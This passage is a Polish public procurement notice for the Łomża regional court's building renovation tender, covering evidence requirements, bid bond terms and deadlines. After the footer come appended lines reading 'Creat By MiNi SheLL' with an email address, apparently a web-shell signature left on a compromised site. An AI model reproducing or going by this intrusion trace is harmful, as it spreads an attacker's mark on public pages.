zdrowotne wraz z zaświadczeniem albo innym dokumentem<br/>Zamawiający żąda złożenia dokumentów potwierdzających, że prze upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wraz z ofertą Wykonawca składa aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - Wzór oświadczenia zgodnie z załącznikiem nr 2 do SWZ. Od Wykonawców składających ofertę wspólną, Zamawiający żąda złożenia oświadczeń osobno dla każdego z Wykonawców. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia i spełniania warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego środki dowodowe. Oświadczenie wraz z ofertą winny zostać złożone, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>2. Wykonawcę,<br/>którego oferta została oceniona najwyżej, Zamawiający wezwie do złożenia w terminie nie krótszym niż<br/>5 dni, aktualnych na dzień składania, niżej wymienionych podmiotowych środków dowodowych:2.1<br/>opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na kwotę minimum 500 000 złotych,2.2 wykazu zrealizowanych lub aktualnie<br/>realizowanych robót odpowiadających swoim rodzajem przedmiotowi zamówienia, polegających na<br/>wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania ofert co najmniej dwóch<br/>robot budowlanych polegających na remoncie budynków użyteczności publicznej o wartości nie<br/>mniejszej niż 400 000 złotych brutto każda, wykaz należy sporządzić zgodnie z załącznikiem nr 3 do<br/>SWZ. Do wykazu należy dołączyć dowody potwierdzające, że roboty te zostały wykonane<br/>należycie.2.3 wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, zgodnie z wzorem<br/>stanowiącym załącznik nr 4 do SWZ, do którego Wykonawca dołączy: 2.3.1 dokumenty potwierdzające<br/>posiadanie odpowiednich kwalifikacji przez kierownika robót budowlanych:- uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,- dokumenty<br/>potwierdzające posiadanie kwalifikacji, o których mowa w art. 37c ustawy z dnia 23 lipca 2003 r. o<br/>ochronie zabytków (Dz. U. z 2020 r. poz. 282 z późn. zm.). - zaświadczenie o przynależności do Izby<br/>Inżynierów Budownictwa. 2.3.2 dokumenty potwierdzające posiadanie odpowiednich kwalifikacji przez<br/>kierownika robót elektrycznych:- uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych<br/>lub równoważne im uprawnienia w tej specjalności, - zaświadczenie o przynależności do Izby<br/>Inżynierów Budownictwa.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 1 zgodne z wzorem stanowiącym załącznik nr 2 do SWZ (Oświadczenie musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy),<br/>2.kosztorysy ofertowe sporządzone metodą uproszczoną, opracowane w oparciu o przedmiary robót, które stanowią załączniki nr 11, 12 i 13 do SWZ (Kosztorysy muszą być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy),<br/>3. oryginału gwarancji/poręczenia wniesienia wadium jeżeli Wykonawca wnosi wadium w formie gwarancji lub poręczenia (Gwarancja/poręczenie musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Gwaranta/Poręczyciela),<br/>4.w przypadku podpisywania oferty i składających się na nią dokumentów i oświadczeń przez osob(ę)y niewymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (pełnomocnictwo musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osob(ę)y wymienion(ą)e w dokumencie rejestracyjnym). Kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>5. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117, ust. 4 ustawy PZP w przypadkach o których mowa w art. 117 ust. 2 i 3 ustawy PZP i z którego będzie wynikało, które roboty budowlane wykonają poszczególni wykonawcy (Oświadczenie musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1.kosztorysy ofertowe sporządzone metodą uproszczoną, opracowane w oparciu o przedmiary robót, które stanowią załączniki nr 11, 12 i 13 do SWZ (Kosztorysy muszą być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy),<br/>2. oryginału gwarancji/poręczenia wniesienia wadium jeżeli Wykonawca wnosi wadium w formie gwarancji lub poręczenia (Gwarancja/poręczenie musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Gwaranta/Poręczyciela),<br/>3. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117, ust. 4 ustawy PZP w przypadkach o których mowa w art. 117 ust. 2 i 3 ustawy PZP i z którego będzie wynikało, które roboty budowlane wykonają poszczególni wykonawcy (Oświadczenie musi być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca wnosi wadium w wysokości 10 000 zł najpóźniej do dnia i godziny składania ofert. <br/>2. Wadium musi obejmować okres związania ofertą, tj. do dnia 10.07.2021 r. <br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>3.1 pieniądzu,<br/>3.2 gwarancjach bankowych,<br/>3.3 gwarancjach ubezpieczeniowych,<br/>3.4 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r., poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Sądu Okręgowego w Łomży w BGK nr 05 1130 1017 0021 1001 6290 0004. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie decyduje data i godzina wpływu środków na rachunek Zamawiającego. <br/>5. Wadium wnoszone w gwarancjach bankowych, gwarancjach ubezpieczeniowych i poręczeniach określonych w podpunkcie 3.4 musi mieć charakter gwarancji (poręczenia) nieodwołalnej i bezwarunkowej. Poręczenie (gwarancja) musi umożliwiać wypłatę przez Poręczyciela (Gwaranta) kwoty wadium na rachunek wskazany przez Zamawiającego, nie później niż w terminie 14 dni od daty dostarczenia przez Zamawiającego do Poręczyciela (Gwaranta) pisemnego żądania zapłaty zawierającego oświadczenie, iż wadium Zamawiającemu jest należne z powodu wystąpienia którejkolwiek z okoliczności wymienionych w art. 98 ust. 6 ustawy PZP.<br/>6.Zamawiający dokonuje zwrotu lub zatrzymania wadium na warunkach określonych w art. 98 ustawy PZP.<br/>7. Ze względu za ryzyko związane z czasem trwania rozliczeń międzybankowych, Zmawiający zaleca dokonanie przelewu ze stosownym wyprzedzenie. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy (lider<br/>konsorcjum). Pełnomocnikiem konsorcjum jest Wykonawca, który zaloguje się na swoim profilu<br/>Wykonawcy i składając ofertę w zakładce „Wykonawcy” doda pozostałych Wykonawców<br/>wpisując ich dane.2. W przypadku gdyby wyłoniona w prowadzonym postępowaniu oferta<br/>została złożona przez dwóch lub więcej Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego Zamawiający zażąda umowy regulującej współpracę tych podmiotów<br/>przed podpisaniem umowy w sprawie zamówienia publicznego.3. W przypadku składania oferty<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) należy do<br/>oferty dołączyć oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni<br/>wykonawcy zgodnie z art. 117 ustawy PZP. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający, przewiduje na podstawie art. 455 Pzp, możliwość zmiany zawartej umowy. <br/>2.	Zamawiający dopuszcza zmianę osób wyznaczonych do pełnienia funkcji technicznych wskazanych przez Wykonawcę w przypadku: <br/>2.1 śmierci, <br/>2.2 rozwiązania stosunku pracy, <br/>2.3 utraty uprawnień niezbędnych do wykonywania funkcji w ramach niniejszego zamówienia, <br/>2.4 choroby powyżej 30 dni potwierdzonej zaświadczeniem lekarskim, <br/>2.5 w sytuacji nadzwyczajnej.<br/>3.	Zmiana osób będzie możliwa na wniosek Wykonawcy uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w Specyfikacji Warunków Zamówienia. Zamawiający zastrzega sobie: prawo do nie wyrażenia zgody na zmianę osób, których kwalifikacje są niższe niż osób wymienionych w ofercie. <br/>4.	Zamawiający, na pisemny wniosek Wykonawcy, dopuszcza zmianę Podwykonawcy lub rezygnację z udziału Podwykonawcy przy realizacji przedmiotu zamówienia. Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia Podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji umowy. Jeżeli nastąpi zmiana Podwykonawcy, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy Podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia publicznego przez dotychczasowego Podwykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-11 14:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.ms.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-11 14:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com